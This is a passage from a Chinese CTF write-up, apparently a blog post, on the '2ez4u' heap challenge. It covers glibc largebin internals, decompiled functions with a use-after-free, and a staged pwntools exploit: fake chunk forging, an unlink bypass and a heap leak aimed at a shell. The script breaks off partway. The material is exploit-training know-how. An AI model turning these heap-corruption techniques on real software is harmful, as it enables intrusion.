<p>对于largebin的申请，通过判断双链表的第一个结点（最大结点）的大小来判断是否存在满足的堆块，如果有则从小到大通过bk_nextsize反向遍历双链表，找到最小的满足申请需求的堆块，如果该堆头下一个结点的大小也满足则将该结点作为目标分配给用户，以此减少链表的fd_nextsize与bk_nextsize操作，提高效率。对于双链表的unlink，需要注意的就是fd_nextsize与bk_nextsize检查，特别需要注意的是当结点是堆头的下一个结点时，它的fd_nextsize与bk_nextsize为0，此时unlink操作与smallbin的unlink操作一致，没有fd_nextsize与bk_nextsize的检查与操作。</p>
<h3 id="例题1-2ez4u"><a href="#例题1-2ez4u" class="headerlink" title="例题1.2ez4u"></a>例题1.2ez4u</h3><p>检查如下<br><img src="images/2021-09-10165719.png" alt="avatar"><br>程序和常见的堆题一样，具有4个功能，add、free、show、edit，<br>先来分析add函数，如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> __int64 <span class="title">sub_BFC</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> i; <span class="comment">// [rsp+4h] [rbp-2Ch]</span></span><br><span class="line">  <span class="keyword">int</span> v2; <span class="comment">// [rsp+8h] [rbp-28h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v3; <span class="comment">// [rsp+Ch] [rbp-24h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v4; <span class="comment">// [rsp+10h] [rbp-20h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v5; <span class="comment">// [rsp+14h] [rbp-1Ch]</span></span><br><span class="line">  _QWORD *v6; <span class="comment">// [rsp+18h] [rbp-18h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v7; <span class="comment">// [rsp+28h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v7 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="keyword">if</span> ( unk_202140 == <span class="number">16</span> )<span class="comment">//数量不能大于16</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;sorry XD&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;color?(0:red, 1:green):&quot;</span>);</span><br><span class="line">    v2 = choice();</span><br><span class="line">    <span class="keyword">if</span> ( (v2 == <span class="number">1</span> || !v2)</span><br><span class="line">      &amp;&amp; (<span class="built_in">printf</span>(<span class="string">&quot;value?(0-999):&quot;</span>), v3 = choice(), v3 &lt;= <span class="number">0x3E7</span>)</span><br><span class="line">      &amp;&amp; (<span class="built_in">printf</span>(<span class="string">&quot;num?(0-16):&quot;</span>), v4 = choice(), v4 &lt;= <span class="number">0x10</span>) )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">&quot;description length?(1-1024):&quot;</span>);</span><br><span class="line">      v5 = choice();</span><br><span class="line">      <span class="keyword">if</span> ( v5 &lt;= <span class="number">0x400</span> &amp;&amp; v5 )<span class="comment">//大小可以是largebin</span></span><br><span class="line">      &#123;</span><br><span class="line">        v6 = <span class="built_in">malloc</span>(v5 + <span class="number">24LL</span>);<span class="comment">//多分配了0x18的内存</span></span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;description of the apple:&quot;</span>);</span><br><span class="line">        sub_A60(v6 + <span class="number">3</span>, v5, <span class="number">10LL</span>);<span class="comment">//最后有\x00</span></span><br><span class="line">        *(_DWORD *)v6 = v2;<span class="comment">//颜色占了堆的fd部分</span></span><br><span class="line">        v6[<span class="number">1</span>] = v3;<span class="comment">//value占了堆的bk部分</span></span><br><span class="line">        *((_DWORD *)v6 + <span class="number">1</span>) = v4;<span class="comment">//num占了堆的fd_nextsize</span></span><br><span class="line">        <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">15</span>; ++i )</span><br><span class="line">        &#123;</span><br><span class="line">          <span class="keyword">if</span> ( !*((_DWORD *)&amp;unk_202040 + <span class="number">4</span> * i) )</span><br><span class="line">          &#123;</span><br><span class="line">            *((_DWORD *)v6 + <span class="number">4</span>) = i;</span><br><span class="line">            *((_QWORD *)&amp;unk_202040 + <span class="number">2</span> * i + <span class="number">1</span>) = v6;</span><br><span class="line">            *((_DWORD *)&amp;unk_202040 + <span class="number">4</span> * i + <span class="number">1</span>) = v5;</span><br><span class="line">            *((_DWORD *)&amp;unk_202040 + <span class="number">4</span> * i) = <span class="number">1</span>;</span><br><span class="line">            ++unk_202140;</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;apple index: %d\n&quot;</span>, (<span class="keyword">unsigned</span> <span class="keyword">int</span>)i);</span><br><span class="line">            <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v7;</span><br><span class="line">          &#125;</span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">      &#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;???&quot;</span>);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;invalid&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v7;<span class="comment">//canary保护</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>show函数如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> __int64 <span class="title">sub_10E6</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v1; <span class="comment">// [rsp+4h] [rbp-Ch]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v2; <span class="comment">// [rsp+8h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v2 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;which?(0-15):&quot;</span>);</span><br><span class="line">  v1 = choice();</span><br><span class="line">  <span class="keyword">if</span> ( v1 &lt;= <span class="number">0xF</span> &amp;&amp; *((_QWORD *)&amp;unk_202040 + <span class="number">2</span> * v1 + <span class="number">1</span>) )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( **((_DWORD **)&amp;unk_202040 + <span class="number">2</span> * v1 + <span class="number">1</span>) )</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;color: green&quot;</span>);</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;color: red&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;num: %d\n&quot;</span>, *(<span class="keyword">unsigned</span> <span class="keyword">int</span> *)(*((_QWORD *)&amp;unk_202040 + <span class="number">2</span> * v1 + <span class="number">1</span>) + <span class="number">4LL</span>));</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;value: %d\n&quot;</span>, (<span class="keyword">unsigned</span> <span class="keyword">int</span>)(<span class="keyword">char</span>)*(_QWORD *)(*((_QWORD *)&amp;unk_202040 + <span class="number">2</span> * v1 + <span class="number">1</span>) + <span class="number">8LL</span>));</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;description:&quot;</span>);</span><br><span class="line">    <span class="built_in">puts</span>((<span class="keyword">const</span> <span class="keyword">char</span> *)(*((_QWORD *)&amp;unk_202040 + <span class="number">2</span> * v1 + <span class="number">1</span>) + <span class="number">24LL</span>));</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;???&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v2;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>显然不能通过fd、bk、fd_nextsize,来泄露堆地址或者libc<br>free函数如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> __int64 <span class="title">sub_E57</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v1; <span class="comment">// [rsp+4h] [rbp-Ch]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v2; <span class="comment">// [rsp+8h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v2 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;which?(0-15):&quot;</span>);</span><br><span class="line">  v1 = choice();</span><br><span class="line">  <span class="keyword">if</span> ( v1 &lt;= <span class="number">0xF</span> &amp;&amp; *((_DWORD *)&amp;unk_202040 + <span class="number">4</span> * v1) )</span><br><span class="line">  &#123;</span><br><span class="line">    *((_DWORD *)&amp;unk_202040 + <span class="number">4</span> * v1) = <span class="number">0</span>;</span><br><span class="line">    <span class="built_in">free</span>(*((<span class="keyword">void</span> **)&amp;unk_202040 + <span class="number">2</span> * v1 + <span class="number">1</span>));</span><br><span class="line">    --unk_202140;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;???&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v2;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>存在uaf<br>因此大概的思路就出来的，通过largebin的bk_nextsize来泄露堆地址以及libc，然后通过largebinattack，来控制<br>内存，最后通过fastbinattack来getshell<br>接下来分部来分析exp</p>
<h4 id="第一部分"><a href="#第一部分" class="headerlink" title="第一部分"></a>第一部分</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x60</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x60</span>)#<span class="number">0</span></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x60</span>)#<span class="number">1</span></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x60</span>)#<span class="number">2</span></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x60</span>)#<span class="number">3</span></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x60</span>)#<span class="number">4</span></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x60</span>)#<span class="number">5</span></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x60</span>)#<span class="number">6</span></span><br><span class="line">add(<span class="number">0x3f0</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x3f0</span>)#<span class="number">7</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">&quot;b&quot;</span>*<span class="number">0x30</span>)#<span class="number">8</span></span><br><span class="line">add(<span class="number">0x3e0</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x3d0</span>)#<span class="number">9</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">&quot;b&quot;</span>*<span class="number">0x30</span>)#<span class="number">10</span></span><br><span class="line">add(<span class="number">0x3f0</span>,<span class="string">&quot;q&quot;</span>*<span class="number">0x3e0</span>)#<span class="number">11</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">&quot;c&quot;</span>*<span class="number">0x30</span>)#<span class="number">12</span></span><br></pre></td></tr></table></figure>
<p>其中的0x30的堆可以防止largebin与topchunk合并，此外有几个0x60的堆用来存放伪造的数据，有几个用来fastbinattack</p>
<h4 id="第二部分"><a href="#第二部分" class="headerlink" title="第二部分"></a>第二部分</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">free</span>(<span class="number">9</span>)</span><br><span class="line"><span class="built_in">free</span>(<span class="number">11</span>)</span><br><span class="line"><span class="built_in">free</span>(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">0x400</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x400</span>)</span><br></pre></td></tr></table></figure>
<p>堆9和堆10都是largebin，这里可以形成链，free(0)防止别的chunk位置被覆盖，也为后面泄露libc内存做铺垫,<br>分配大于largebin中的堆，将它们放到unsortedbin中</p>
<h4 id="第三部分"><a href="#第三部分" class="headerlink" title="第三部分"></a>第三部分</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">target_ad = heap_ad + <span class="number">0xb0</span></span><br><span class="line">chunk1_ad = heap_ad + <span class="number">0x130</span></span><br><span class="line">chunk2_ad = heap_ad + <span class="number">0x1b0</span></span><br><span class="line">victim_ad = heap_ad + <span class="number">0xc30</span></span><br><span class="line">edit(<span class="number">11</span>,p64(chunk1_ad))<span class="comment">//这个是通过uaf漏洞修改堆11的bk_nextsize，为chunk1_ad</span></span><br><span class="line">edit(<span class="number">1</span>,p64(<span class="number">0</span>)+p64(chunk1_ad))</span><br><span class="line">chunk2 = p64(<span class="number">0</span>)</span><br><span class="line">chunk2 += p64(<span class="number">0</span>)</span><br><span class="line">chunk2 += p64(<span class="number">0x421</span>)</span><br><span class="line">chunk2 += p64(<span class="number">0</span>)</span><br><span class="line">chunk2 += p64(<span class="number">0</span>)</span><br><span class="line">chunk2 += p64(chunk1_ad)</span><br><span class="line">edit(<span class="number">0x3</span>,chunk2)</span><br><span class="line">chunk1 = p64(<span class="number">0</span>)</span><br><span class="line">chunk1 += p64(<span class="number">0</span>)</span><br><span class="line">chunk1 += p64(<span class="number">0x411</span>)</span><br><span class="line">chunk1 += p64(target_ad - <span class="number">0x18</span>)</span><br><span class="line">chunk1 += p64(target_ad - <span class="number">0x10</span>)</span><br><span class="line">chunk1 += p64(victim_ad)</span><br><span class="line">chunk1 += p64(chunk2_ad)</span><br><span class="line">edit(<span class="number">2</span>,chunk1)</span><br><span class="line">edit(<span class="number">7</span>,<span class="string">&quot;7&quot;</span>*<span class="number">0x198</span>+p64(<span class="number">0x410</span>)+p64(<span class="number">0x411</span>))</span><br></pre></td></tr></table></figure>
<p>gdb调试过程<br>edit(11,p64(chunk1_ad))结果如下,这里是将11这个堆的bk_nextsize设为chunk1_ad(伪造的堆)<br><img src="/images/2021-09-10175021.png" alt="avatar"><br>edit(1,p64(0)+p64(chunk1_ad))结果如下，这里是用来绕过unlink保护target_ad-0x18和target-0x10那个地方<br>(FD-&gt;BK=p,BK-&gt;FD=p)<br><img src="/images/2021-09-10185304.png" alt="avatar"><br>edit(0x3,chunk2)结果如下，这个伪造的堆对应p64(chunk2_ad)<br><img src="/images/2021-09-10191722.png" alt="avatar"><br>edit(2,chunk1)结果如下，这里就是伪造的要被unlink的堆<br><img src="/images/2021-09-10191903.png" alt="avatar"><br>edit(7,”7”* 0x198+p64(0x410)+p64(0x411))结果如下，这里是伪造与0x130那个伪造的堆相邻的堆<br><img src="/images/2021-09-10195218.png" alt="avatar"></p>
<h4 id="第四部分"><a href="#第四部分" class="headerlink" title="第四部分"></a>第四部分</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">free</span>(<span class="number">6</span>)</span><br><span class="line"><span class="built_in">free</span>(<span class="number">3</span>)</span><br><span class="line">add(<span class="number">0x3f0</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x30</span>+p64(<span class="number">0xdeadbeefdeadbeef</span>))</span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&quot;b&quot;</span>*<span class="number">0x60</span>)</span><br><span class="line">show(<span class="number">3</span>)</span><br></pre></td></tr></table></figure>
<p>free6和3之后，如图所示<br><img src="/images/2021-09-10211057.png" alt="avatar"><br>add(0x3f0)后，两个0x80的堆放到smallbin中，并且add得到的堆是伪造的堆结果如下<br><img src="/images/2021-09-10211635.png" alt="avatar"><br>此时add(0x60)，main_arena就到0xdeadbeefdeadbeef后面了(原本在堆0的main_arena就到了堆3)<br><img src="/images/2021-09-10215626.png" alt="avatar"></p>
<p>最终的exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">choice = <span class="number">0</span></span><br><span class="line">file_name = <span class="string">&quot;./2ez4u&quot;</span></span><br><span class="line">elf = ELF(file_name)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(choice == <span class="number">1</span>):</span><br><span class="line">  address = <span class="string">&quot;node4.buuoj.cn&quot;</span></span><br><span class="line">  <span class="comment">#libc_path = &quot;/home/giantbranch/libc/buu/libc-2.23-64.so&quot;</span></span><br><span class="line">  libc_path = <span class="string">&quot;libc.so&quot;</span> </span><br><span class="line">  libc = ELF(libc_path)</span><br><span class="line">  port = <span class="number">11111</span></span><br><span class="line">  p = remote(address,port)</span><br><span class="line"></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">  <span class="comment">#libc_path = &quot;/lib/x86_64-linux-gnu/libc.so.6&quot;</span></span><br><span class="line">  libc_path = <span class="string">&quot;libc.so&quot;</span> </span><br><span class="line">  libc = ELF(libc_path)</span><br><span class="line">  p = process(file_name)</span><br><span class="line"></span><br><span class="line"><span class="comment">#log_level = &quot;debug&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span>():</span></span><br><span class="line">  gdb.attach(p)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">sed</span>(<span class="params">s</span>):</span></span><br><span class="line">  p.send(s)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">sedl</span>(<span class="params">s</span>):</span></span><br><span class="line">  p.sendline(s)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">reu</span>(<span class="params">s</span>):</span></span><br><span class="line">  p.recvuntil(s)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,con</span>):</span></span><br><span class="line">  reu(<span class="string">&quot;your choice: &quot;</span>)</span><br><span class="line">  sedl(<span class="string">&quot;1&quot;</span>)</span><br><span class="line">  reu(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">  sedl(<span class="string">&quot;0&quot;</span>)</span><br><span class="line">  reu(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">  sedl(<span class="string">&quot;0&quot;</span>)</span><br><span class="line">  reu(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">  sedl(<span class="string">&quot;0&quot;</span>)</span><br><span class="line">  reu(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">  sedl(<span class="built_in">str</span>(size))</span><br><span class="line">  reu(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">  sedl(con)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">idx</span>):</span></span><br><span class="line">  reu(<span class="string">&quot;your choice: &quot;</span>)</span><br><span class="line">  sedl(<span class="string">&quot;2&quot;</span>)</span><br><span class="line">  reu(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">  sedl(<span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">idx,con</span>):</span></span><br><span class="line">  reu(<span class="string">&quot;your choice: &quot;</span>)</span><br><span class="line">  sedl(<span class="string">&quot;3&quot;</span>)</span><br><span class="line">  reu(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">  sedl(<span class="built_in">str</span>(idx))</span><br><span class="line">  reu(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">  sedl(<span class="string">&quot;2&quot;</span>)</span><br><span class="line">  reu(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">  sedl(<span class="string">&quot;1000&quot;</span>)</span><br><span class="line">  reu(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">  sedl(<span class="string">&quot;17&quot;</span>)</span><br><span class="line">  reu(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">  sedl(con)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">idx</span>):</span></span><br><span class="line">  reu(<span class="string">&quot;your choice: &quot;</span>)</span><br><span class="line">  sedl(<span class="string">&quot;4&quot;</span>)</span><br><span class="line">  reu(<span class="string">&quot;:&quot;</span>)</span><br><span class="line">  sedl(<span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x60</span>)<span class="comment">#0</span></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x60</span>)<span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x60</span>)<span class="comment">#2</span></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x60</span>)<span class="comment">#3</span></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x60</span>)<span class="comment">#4</span></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x60</span>)<span class="comment">#5</span></span><br><span class="line">add(<span class="number">0x60</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x60</span>)<span class="comment">#6</span></span><br><span class="line">add(<span class="number">0x3f0</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x3f0</span>)<span class="comment">#7</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">&quot;b&quot;</span>*<span class="number">0x30</span>)<span class="comment">#8</span></span><br><span class="line">add(<span class="number">0x3e0</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x3d0</span>)<span class="comment">#9</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">&quot;b&quot;</span>*<span class="number">0x30</span>)<span class="comment">#10</span></span><br><span class="line">add(<span class="number">0x3f0</span>,<span class="string">&quot;q&quot;</span>*<span class="number">0x3e0</span>)<span class="comment">#11</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">&quot;c&quot;</span>*<span class="number">0x30</span>)<span class="comment">#12</span></span><br><span class="line"></span><br><span class="line">free(<span class="number">9</span>)</span><br><span class="line">free(<span class="number">11</span>)</span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x400</span>,<span class="string">&quot;a&quot;</span>*<span class="number">0x400</span>)</span><br><span class="line">show(<span class="number">11</span>)</span><br><span class="line">reu(<span class="string">&quot;description:&quot;</span>)</span><br><span class="line"><span class="comment">#print p.recv()</span></span><br><span class="line">heap_ad = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&quot;\x00&quot;</span>)) -  <span class="number">0x7e0</span></span><br><span class="line"></span><br><span class="line">log.info(<span class="string">&quot;heap_ad: &quot;</span> + <span class="built_in">hex</span>(heap_ad))</span><br><span 